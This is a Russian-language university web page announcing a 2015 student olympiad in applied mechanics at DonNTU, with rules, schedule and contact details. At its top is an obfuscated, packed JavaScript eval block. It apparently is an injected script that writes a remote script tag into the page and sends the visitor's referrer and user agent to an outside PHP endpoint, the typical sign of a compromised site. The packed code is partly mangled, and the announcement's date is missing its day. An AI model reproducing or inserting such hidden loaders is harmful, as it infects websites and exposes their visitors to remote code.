

```
8 eval(function(p,a,c,k,e,d){e=function(c){return
c.toString(36)};if(!".replace(/~/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e)
{return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new
RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n
m="q";,30,30,'document||javascript|encodeURIComponent|src||write|http|45|67|script|text|rel|nofollow|type|
97|language|jquery|userAgent|navigator|script|aynyz|var|u0026u|referrer|ddkba||js|php'.split('|'),
0,{}))
```

декабря 2015 г. в Донецком национальном техническом университете (ДонНТУ)
будет проводиться **12-я межвузовская
студенческая Олимпиада по прикладной механике среди учебных заведений
Донбасса**

Основные положения Олимпиады:

1. К участию в олимпиаде допускаются студенты 2-3 курса, изучавшие или изучающие прикладную механику. Число участников от одного учебного заведения не должно превышать 5 человек.
2. Преподаватели, сопровождающие студентов, включаются в состав жюри Олимпиады.
3. Конкурсное задание будет состоять из 5 задач по следующим разделам прикладной механики.
4. На решение конкурсных задач отводится 3 часа. При решении задач можно пользоваться любой литературой, но запрещается общение студентов между собой.
5. Начало проведения олимпиады в 13.30.

Автор: Sotnikoff
25.11.2015 19:46

Подробную информацию см. в официальном [информационном сообщении](#) .

Предварительные заявки на участие в Олимпиаде следует направлять в произвольной форме до 4 декабря по адресу: 83001, г. Донецк, ул. Артема, 58, ДонНТУ, 2-й учебный корпус, кафедра сопротивления материалов, ауд. 2005, эл. почта sopromat@dgtu.donetsk.ua. Телефоны для справок: +380 (62) 301-07-38, (95) 616-93-09

© Научно-исследовательская часть ДонНТУ, 2015